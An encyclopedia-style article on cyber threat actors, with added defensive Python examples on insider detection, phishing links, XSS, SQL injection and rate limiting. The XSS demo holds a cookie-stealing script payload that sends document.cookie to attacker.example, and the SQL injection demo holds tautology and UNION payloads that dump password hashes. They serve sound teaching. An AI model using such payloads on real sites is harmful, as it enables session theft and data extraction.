A threat actor or malicious actor is either a person or a group of people that take part in an action intended to cause harm to the cyber realm, including computers, devices, systems, or networks.
The term is typically used to describe individuals or groups that perform malicious acts against a person or an organization of any type or size. Threat actors engage in cyber-related offenses to exploit open vulnerabilities and disrupt operations.
Threat actors have different educational backgrounds, skills, and resources.
The frequency and classification of cyber attacks change rapidly. The background of threat actors helps dictate who they target, how they attack, and what information they seek. There are a number of threat actor categories, including cyber criminals, nation-state actors, ideologues, thrill seekers/trolls, insiders, and competitors. These threat actors all have distinct motivations, techniques, targets, and uses of stolen data.
Background
The development of cyberspace has brought both advantages and disadvantages to society. While cyberspace has helped further technological innovation, it has also brought various forms of cyber crime. Since the dawn of cyberspace, individual, group, and nation-state threat actors have engaged in cyber-related offenses to exploit victims' vulnerabilities.
There are a number of threat actor categories, each with different motives and targets.
Financially motivated actors
Cyber criminals have two main objectives. First, they want to infiltrate a system to access valuable data or items. Second, they want to avoid legal consequences after infiltrating a system. Cyber criminals can be broken down into three sub-groups: mass scammers/automated hackers, criminal infrastructure providers, and big game hunters.
Mass scammers and automated hackers are cyber criminals who attack systems for monetary gain. These threat actors use tools to infect organizations' computer systems, then demand payment from the victims in exchange for restoring access to their data.
Criminal infrastructure providers are threat actors who use tools to infect an organization's computer systems and then sell access to the compromised infrastructure to other parties, who exploit it in turn. Typically, victims of criminal infrastructure providers are unaware that their systems have been infected.
Big game hunters are another sub-group of cyber criminals, who aim to attack a single, high-value target. Big game hunters spend extra time learning about their target, including its system architecture and the other technologies it uses. Victims can be targeted by email, by phone, or through other social engineering techniques.
Nation-state actors
Nation-state threat actors aim to gain intelligence of national interest. Nation-state actors can be interested in a number of sectors, including nuclear, financial, and technology information.
There are two ways nations use nation-state actors. First, some nations make use of their own governmental intelligence agencies. Second, some nations work with organizations that specialize in cyber crime. States that use outside groups can be tracked; however, states will not necessarily take accountability for acts conducted by the outside group. Nation-state actors can attack either other nations or outside organizations, including private companies and non-governmental organizations. They typically aim to bolster their nation-state's counterintelligence strategy.
Nation-state attacks can include strategic sabotage or critical infrastructure attacks. Nation states are considered an incredibly large group of threat actors in the cyber realm.
Ideologues (hacktivists and terrorists)
Threat actors that are considered ideologues include two groups of attackers: hacktivists and terrorists. These two groups can be grouped together because they are similar in goals. However, hacktivists and terrorists differ in how they commit cyber crimes.
Hacktivism is a term that was coined in the early days of the World Wide Web. It is derived from a combination of two words: hacking and activism.
Hacktivists typically are individuals or entities that are ready to commit cyber crimes to further their own beliefs and ideologies.
Many hacktivists are anti-capitalist or anti-corporate idealists, and their attacks are inspired by related political and social issues.
Terrorists are individuals or groups that aim to cause terror to achieve their goals. The main difference between hacktivists and terrorists is their end goal: hacktivists are willing to break computer security laws to spread their message, while terrorists aim to cause terror. Ideologues, unlike other types of threat actors, are typically not motivated by financial incentives.
Thrill seekers and trolls
A thrill seeker is a type of threat actor that attacks a system for the sole purpose of experimentation. Thrill seekers are interested in learning more about how computer systems and networks operate and want to see how far into a computer system they can get. While they do not aim to cause major damage, they can still cause problems for an organization's systems. Over time, thrill seekers have evolved into modern trolls. Like thrill seekers, a troll is a person or group that attacks a system for recreation; unlike thrill seekers, however, trolls aim to cause harm.
Modern-day trolls can spread misinformation and cause harm.
Insiders and competitors
Insiders are a type of threat actor that can be either an insider who sells network information to other adversaries, or a disgruntled employee who feels the need to retaliate because they believe they have been treated unfairly.
Insider attacks can be challenging to prevent; however, with a structured logging and analysis plan in place, insider threat actors can be detected after a successful attack.
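The "structured logging and analysis plan" above is abstract, so here is an added example (not part of the original article) of what such analysis looks like in practice: a small detector run over constructed JSON Lines audit records. The record shape, the business-hours baseline, the byte threshold and the "usb:" destination prefix are all assumptions for the demonstration; real thresholds must be tuned against an organization's own baseline.

```python
import json
from collections import Counter, defaultdict
from datetime import datetime

# Constructed JSON Lines audit records, not real data: one record per file
# access, in the shape a file server or DLP agent might emit.
SAMPLE_AUDIT_LOG = """\
{"ts": "2024-03-04T09:12:01Z", "user": "alice", "action": "read", "path": "/finance/q1-forecast.xlsx", "bytes": 120000}
{"ts": "2024-03-04T09:15:44Z", "user": "alice", "action": "read", "path": "/finance/q1-actuals.xlsx", "bytes": 98000}
{"ts": "2024-03-04T23:41:10Z", "user": "bob", "action": "read", "path": "/hr/salaries.csv", "bytes": 2400000}
{"ts": "2024-03-04T23:42:03Z", "user": "bob", "action": "read", "path": "/hr/contracts.zip", "bytes": 88000000}
{"ts": "2024-03-04T23:43:57Z", "user": "bob", "action": "copy", "path": "/hr/contracts.zip", "bytes": 88000000, "dest": "usb:E:"}
{"ts": "2024-03-05T02:10:12Z", "user": "bob", "action": "read", "path": "/engineering/design-docs.tar", "bytes": 310000000}
{"ts": "2024-03-05T10:01:00Z", "user": "carol", "action": "read", "path": "/engineering/readme.md", "bytes": 4000}
"""

# Assumed baseline: normal working hours are 08:00-18:59 UTC.
BUSINESS_HOURS = range(8, 19)


def parse_events(text):
    """Parse JSON Lines records; timestamps become datetime objects."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        rec["ts"] = datetime.strptime(rec["ts"], "%Y-%m-%dT%H:%M:%SZ")
        events.append(rec)
    return events


def find_insider_candidates(text, byte_threshold=100_000_000,
                            business_hours=BUSINESS_HOURS):
    """Return {user: sorted reasons} for every user matching at least one rule.

    Rules (thresholds are assumptions to be tuned against a real baseline):
      off_hours        any access outside business_hours
      bulk_volume      more than byte_threshold bytes read by one user in one day
      removable_media  a copy whose destination is removable media
    """
    reasons = defaultdict(set)
    daily_bytes = Counter()
    for e in parse_events(text):
        user = e["user"]
        if e["ts"].hour not in business_hours:
            reasons[user].add("off_hours")
        if e["action"] == "read":
            daily_bytes[(user, e["ts"].date())] += e.get("bytes", 0)
        if e["action"] == "copy" and e.get("dest", "").startswith("usb:"):
            reasons[user].add("removable_media")
    for (user, _day), total in daily_bytes.items():
        if total > byte_threshold:
            reasons[user].add("bulk_volume")
    return {u: sorted(r) for u, r in reasons.items()}


if __name__ == "__main__":
    for user, why in find_insider_candidates(SAMPLE_AUDIT_LOG).items():
        print(user, ", ".join(why))
```

On the constructed log only "bob" is flagged, for all three reasons; "alice" and "carol" stay within the baseline. The point of keeping the rules separate is that each one is weak on its own (plenty of legitimate off-hours work exists), while the combination is what an analyst would want to review.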
Business competitors can be another threat actor that harms organizations. Competitors can gain access to organization secrets that are normally kept secure. Organizations can try to gain a stronger knowledge of business intelligence to protect themselves against a competitor threat actor.
Identified threat actors
Internet Research Agency
Organizations that identify threat actors
Government organizations
United States (US) - National Institute of Standards and Technology (NIST)
The National Institute of Standards and Technology (NIST) is a government agency that works on issues dealing with cyber security at the national level. NIST has written reports on cyber security guidelines, including guidelines on conducting risk assessments. NIST typically classifies cyber threat actors as national governments, terrorists, organized crime groups, hacktivists, and hackers.
European Union (EU) - The European Union Agency for Cybersecurity (ENISA)
The European Union Agency for Cybersecurity (ENISA) is a European Union agency tasked with working on cyber security capabilities. ENISA provides both research and assistance to information security experts within the EU.
This organization published a cyber threat report up until 2019. The goal of this report is to identify incidents that have been published and attribute those attacks to the most likely threat actor. The latest report identifies nation-states, cyber criminals, hacktivists, cyber terrorists, and thrill seekers.
United Nations (UN)
The United Nations General Assembly (UNGA) has also been working to bring awareness to issues in cyber security. The UNGA released a report in 2019 regarding developments in the field of information and telecommunications in the context of international security.
This report identifies the following threat actors: nation-states, cyber criminals, hacktivists, terrorist groups, thrill seekers, and insiders.
Canada - Canadian Centre for Cyber Security (CCCS)
Canada defines threat actors as states, groups, or individuals who aim to cause harm by exploiting a vulnerability with malicious intent. A threat actor must be trying to gain access to information systems in order to access or alter data, devices, systems, or networks.
Japan - National Center of Incident Readiness and Strategy for Cybersecurity (NISC)
The Japanese government's National Center of Incident Readiness and Strategy for Cybersecurity (NISC) was established in 2015 to create a "free, fair and secure cyberspace" in Japan. The NISC published a cybersecurity strategy in 2018 that identifies nation-states and cybercrime as some of the most significant threats. It also indicates that terrorist use of cyberspace needs to be monitored and understood.
Russia - Security Council of the Russian Federation
The Security Council of the Russian Federation published its cyber security strategy doctrine in 2016.
This strategy highlights the following threat actors as risks to cyber security measures: nation-state actors, cyber criminals, and terrorists.
Non-Government Organizations
CrowdStrike
CrowdStrike is a cybersecurity technology and antivirus company that publishes an annual threat report. Its 2021 Global Threat Report identifies nation-states and cybercriminals as two major threats to cyber security.
FireEye
FireEye is a cybersecurity firm involved in detecting and preventing cyber attacks. It publishes an annual report on detected threat trends, containing results from its customers' sensor systems. Its threat report lists state-sponsored actors, cyber criminals, and insiders as current threats.
McAfee
McAfee is an American global computer security software company. The company publishes a quarterly threat report that identifies key issues in cybersecurity. The October 2021 threat report outlines cybercriminals as one of the biggest threats in the field.
Verizon
Verizon is an American multinational telecommunications company that publishes a threat report based on past customer incidents. It asks the following question when defining threat actors: "Who is behind the event? This could be the external “bad guy” who launches a phishing campaign or an employee who leaves sensitive documents in their seat back pocket". The report outlines nation-state actors and cybercriminals as two types of threat actors.
Techniques
Phishing
Phishing is one method that threat actors use to obtain sensitive data, including usernames, passwords, credit card information, and social security numbers. A phishing attack occurs when a threat actor sends a fraudulent message designed to trick the victim into either revealing sensitive information to the threat actor or deploying malicious software on the victim's system.
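The fraudulent message almost always carries a link, and the link's host is one of the few things a defender can check mechanically. The following is an added example, not code from the original article: it pulls every URL out of a constructed phishing message and classifies the host against an assumed allowlist of legitimate domains, catching the two common tricks of putting the real brand in a subdomain of an attacker-controlled domain and registering a typo-squatted lookalike. The allowlist, the message text, the edit-distance cutoff and the "last two labels" domain heuristic are all assumptions for the demonstration.

```python
import re
from urllib.parse import urlparse

# Assumed allowlist of domains the organization actually sends mail from.
TRUSTED_DOMAINS = {"example.com", "bank.example"}

URL_RE = re.compile(r"https?://[^\s<>\"']+", re.IGNORECASE)


def levenshtein(a, b):
    """Edit distance between two strings (classic dynamic-programming form)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def registrable_domain(host):
    """Naive 'last two labels' approximation. A real deployment should use the
    Public Suffix List so that names such as example.co.uk are handled."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def classify_host(host, trusted=TRUSTED_DOMAINS, max_distance=2):
    """Return one of: trusted, brand_in_subdomain, lookalike, unknown."""
    host = host.lower().rstrip(".")
    for t in trusted:
        if host == t or host.endswith("." + t):
            return "trusted"
    for t in trusted:
        # e.g. example.com.account-verify.net: the trusted name appears as a
        # run of labels inside a domain the attacker controls.
        if f".{t}." in f".{host}":
            return "brand_in_subdomain"
    reg = registrable_domain(host)
    for t in trusted:
        if levenshtein(reg, t) <= max_distance:
            return "lookalike"
    return "unknown"


def scan_message(text):
    """Extract every URL from a message body and classify its host."""
    results = []
    for url in URL_RE.findall(text):
        url = url.rstrip(".,;:)")
        host = urlparse(url).hostname
        verdict = classify_host(host) if host else "unknown"
        results.append((url, verdict))
    return results


# Constructed sample phishing message, not a real one.
SAMPLE_MESSAGE = """\
Dear customer, your account will be suspended. Reset your password at
https://example.com/reset or confirm your identity at
https://example.com.account-verify.net/login within 24 hours.
Alternative link: https://examp1e.com/login
Read more: https://news.unrelated.org/article
"""

if __name__ == "__main__":
    for url, verdict in scan_message(SAMPLE_MESSAGE):
        print(f"{verdict:18} {url}")
```

The order of the checks matters: a host is only called a lookalike after it has failed the exact-match and brand-in-subdomain tests, so a genuine subdomain such as mail.example.com is never flagged. This is a heuristic for triage, not a verdict; homoglyph (IDN) attacks and freshly registered but dissimilar domains need other signals.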
Cross-Site Scripting
Cross-site scripting (XSS) is a type of security vulnerability in which a threat actor injects a client-side script into an otherwise safe and trusted web application. The injected script then runs in the browsers of other users who view the affected page, which allows the threat actor to access sensitive data such as session cookies.
[Source: "What is a Web Application Firewall? WAF Explained", CrowdStrike, https://www.crowdstrike.com/cybersecurity-101/web-application-firewall/, accessed 2021-12-08]
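To make the injection concrete, here is an added example (not from the original article or the cited source): a comment-rendering function in the vulnerable form beside its hardened form, rendered with two constructed attacker inputs. One payload injects a script element into element content; the other breaks out of an attribute value. The markup layout and the attacker strings are assumptions for the demonstration.

```python
import html

# Constructed attacker inputs, not taken from any real incident.
SCRIPT_PAYLOAD = "<script>fetch('https://attacker.example/?c=' + document.cookie)</script>"
ATTRIBUTE_PAYLOAD = '" onmouseover="alert(1)'


def render_comment_unsafe(display_name, body):
    """Vulnerable: untrusted strings are concatenated straight into markup,
    once inside an attribute value and once inside element content."""
    return f'<div class="comment" data-user="{display_name}"><p>{body}</p></div>'


def render_comment_safe(display_name, body):
    """Hardened: every untrusted string is escaped for the HTML context it
    lands in. quote=True additionally escapes both quote characters, which
    is what stops the attribute-breakout payload."""
    return '<div class="comment" data-user="{}"><p>{}</p></div>'.format(
        html.escape(display_name, quote=True),
        html.escape(body, quote=True),
    )


def has_injected_markup(rendered):
    """Crude check used only to illustrate the difference: does a raw <script>
    tag or an unescaped event-handler attribute appear in the output?"""
    lowered = rendered.lower()
    return "<script" in lowered or ' onmouseover="' in lowered


if __name__ == "__main__":
    for name, body in (("mallory", SCRIPT_PAYLOAD), (ATTRIBUTE_PAYLOAD, "hi")):
        print("unsafe:", render_comment_unsafe(name, body))
        print("safe:  ", render_comment_safe(name, body))
```

Escaping is context-specific: html.escape is correct for element content and quoted attribute values, but a value placed inside a script block, a URL, or CSS needs the encoder for that context, and a templating engine with auto-escaping enabled is the usual way to avoid forgetting one.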
SQL Injections
SQL injection is a code injection technique used by threat actors to attack data-driven applications. Threat actors insert malicious SQL statements into an entry field for execution, which allows them to extract, alter, or delete the victim's information.
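The following added example (not from the original article) shows the mechanism with an in-memory SQLite database: the same lookup written with string formatting, where a quote character in the input rewrites the statement, and with a bound parameter, where the input can only ever be data. The table, rows and attacker strings are constructed for the demonstration.

```python
import sqlite3


def build_demo_db():
    """In-memory SQLite database with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
        "password_hash TEXT, role TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password_hash, role) VALUES (?, ?, ?)",
        [("alice", "hash-a", "admin"), ("bob", "hash-b", "user")],
    )
    return conn


def lookup_user_unsafe(conn, username):
    """Vulnerable: the untrusted value is spliced into the SQL text, so the
    quote characters in it change the statement's structure."""
    query = f"SELECT username, role FROM users WHERE username = '{username}'"
    return conn.execute(query).fetchall()


def lookup_user_safe(conn, username):
    """Hardened: a bound parameter is always data, never SQL syntax."""
    return conn.execute(
        "SELECT username, role FROM users WHERE username = ?", (username,)
    ).fetchall()


# Constructed attacker inputs for the demonstration.
TAUTOLOGY = "nobody' OR '1'='1"
UNION_DUMP = "nobody' UNION SELECT username, password_hash FROM users --"

if __name__ == "__main__":
    conn = build_demo_db()
    print("unsafe, tautology: ", lookup_user_unsafe(conn, TAUTOLOGY))
    print("unsafe, union dump:", lookup_user_unsafe(conn, UNION_DUMP))
    print("safe, tautology:   ", lookup_user_safe(conn, TAUTOLOGY))
    print("safe, union dump:  ", lookup_user_safe(conn, UNION_DUMP))
```

The tautology input turns a lookup for one user into a lookup for every user, and the UNION input pulls a column the query never exposed (password hashes) into the result; both return nothing through the parameterised version because no user is literally named that string. Parameter binding, not input filtering, is the fix.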
Denial of Service Attacks
A denial-of-service attack (DoS attack) is a cyber-attack in which a threat actor seeks to make a machine or network resource unavailable to its intended users by temporarily or indefinitely disrupting the services of a network host. Threat actors conduct a DoS attack by overwhelming the target with bogus requests so that legitimate requests cannot be served.
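The standard first line of defence against a request flood at the application layer is per-source rate limiting. The block below is an added example, not from the original article: a token-bucket limiter keyed by source address, run over constructed traffic in which one address sends 200 requests in a second while a normal client sends three per second. The rate, burst size, addresses (documentation ranges) and request timings are assumptions for the demonstration.

```python
from collections import defaultdict


class TokenBucket:
    """Classic token bucket: `rate` tokens per second, at most `burst` stored."""

    def __init__(self, rate, burst):
        self.rate = rate
        self.burst = burst
        self.tokens = float(burst)
        self.last = 0.0

    def allow(self, now):
        """Refill for the elapsed time, then spend one token if available."""
        elapsed = max(0.0, now - self.last)
        self.tokens = min(self.burst, self.tokens + elapsed * self.rate)
        self.last = now
        if self.tokens >= 1.0:
            self.tokens -= 1.0
            return True
        return False


class PerSourceLimiter:
    """One bucket per source address, so a flood from one source cannot
    starve everyone else at this layer."""

    def __init__(self, rate, burst):
        self.buckets = defaultdict(lambda: TokenBucket(rate, burst))

    def allow(self, source, now):
        return self.buckets[source].allow(now)


def simulate(requests, rate=5.0, burst=10):
    """requests: iterable of (timestamp_seconds, source). Returns
    {source: (accepted, dropped)} counts after applying the limiter."""
    limiter = PerSourceLimiter(rate, burst)
    stats = defaultdict(lambda: [0, 0])
    for ts, source in sorted(requests):
        stats[source][0 if limiter.allow(source, ts) else 1] += 1
    return {s: tuple(v) for s, v in stats.items()}


def constructed_traffic():
    """Constructed traffic (documentation addresses, not real hosts):
    200 requests in one second from the flood source, and a normal client
    sending 3 requests per second for two seconds."""
    flood = [(i / 200.0, "198.51.100.7") for i in range(200)]
    legit = [(i / 3.0, "203.0.113.5") for i in range(6)]
    return flood + legit


if __name__ == "__main__":
    for source, (ok, dropped) in simulate(constructed_traffic()).items():
        print(f"{source:15} accepted={ok:4} dropped={dropped:4}")
```

With a burst of 10 and a refill of 5 per second, the flood source gets its first 10 requests plus 4 more from refill during the second, and the remaining 186 are dropped, while the normal client is never limited. Note what this does not cover: a volumetric attack that saturates the upstream link, or a distributed attack spread over many sources, has to be absorbed further upstream (at the network edge or a scrubbing provider), because by the time packets reach this code the damage is done.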